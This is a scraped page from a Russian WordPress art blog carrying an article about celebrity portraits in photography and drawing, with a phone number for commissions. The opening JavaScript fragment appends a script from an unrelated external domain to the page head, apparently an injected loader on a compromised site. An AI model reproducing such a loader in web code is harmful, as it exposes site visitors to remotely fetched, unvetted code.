, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Портреты знаменитостей

Автор: Дмитрий Алмазов | 06 Фев 2014

Портрет знаменитостиИзо дня в день мы везде и всюду встречаем портреты знаменитостей: будь то рекламный щит по дороге на работу, телевизионные заставки, первые страницы глянцевых журналов и газет. Казалось бы, одни и те же лица… Но каждый раз мы невольно останавливаемся, вглядываемся в знакомые черты, ищем произошедшие изменения,  в глубине души отмечаем положительный или отрицательный характер этих трансформаций.

Съемка портретов знаменитостей – это одна из сторон фотожурналистики. Причем очень многогранная и сложная, так как заставляет фотографов думать совершенно по-другому. Фотографировать знаменитостей очень сложно. Это ведь люди с незаурядной внешностью и темпераментом. Как правило, время, отведенное для съемки, ограничено – больше десяти минут со знаменитостью уже роскошь, а место иногда и вовсе оставляет желать лучшего – номер в гостинице, какой-нибудь коридор концертного зала или медиа-центра. Но в результате этой необычной, порой изнуряющей работы появляется та самая уникальная фотография, которая заставляет нас замереть на долю секунды.

Художники создают портреты знаменитостей с помощью разнообразных  материалов. Могут быть использованы традиционные карандаш и различные виды красок, авторучки, циркуль, уголь, таблетки, конфеты, изжеванные жевательные резинки, гвозди, кристаллы.

Портреты могут представлять собой яркую палитру цветов либо иметь минимальное количество  прорисованных деталей, либо вообще могут быть выполнены с помощью слов. Словесные портреты при этом составлены не из случайных слов. Например, все музыканты воссоздаются посредством текстов их же песен, а киноактеры – с помощью фраз из фильмов, в которых они сыграли запоминающиеся роли.

Любовь рисовать каракули, как оказалось, присуща не только маленьким деткам, но и очень даже взрослым художникам-портретистам.

Иногда бывает очень трудно поверить, что суперреалистичные портреты знаменитостей нарисованы карандашом. При первом взгляде на них кажется, что это фотографии, снимки популярных звезд телевидения и музыкальной сцены. И, тем не менее, мы вглядываемся и понимаем, что этот  портрет знаменитости нарисован карандашом. Рисунки простым карандашом на белом фоне контрастны и ярки, сразу же привлекают внимание зрителей. Портрет очень выразителен и передает все наиболее узнаваемые черты знаменитости до мельчайших деталей: и рано появившуюся седину, и блеск в глазах, и каждую морщинку, и необычной формы губы. Нам остается только восхищаться мастерством художника.

Портрет знаменитости техника Сухая кистьКаждый художник мечтает о том, чтобы его портрет знаменитости был самым  привлекательным для зрителя.

Для знаменитости портрет, выставленный на всеобщее обозрение – это один из способов показать себя с неожиданной стороны, а для зрителя – это возможность увидеть знаменитость в необычном ракурсе.

Другой причиной широкой популярности портретов знаменитостей является то, что для многих такие люди являются символами успешности и таланта, примерами для подражания. Именно поэтому их портреты украшают комнаты многих домов и офисов, и при этом становятся отражением индивидуальности своего владельца.

Заказать портрет знаменитости Вы можете по телефону +7(960)134-46-27 или в разделе контакты через специальную форму.

Темы: Портрет | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress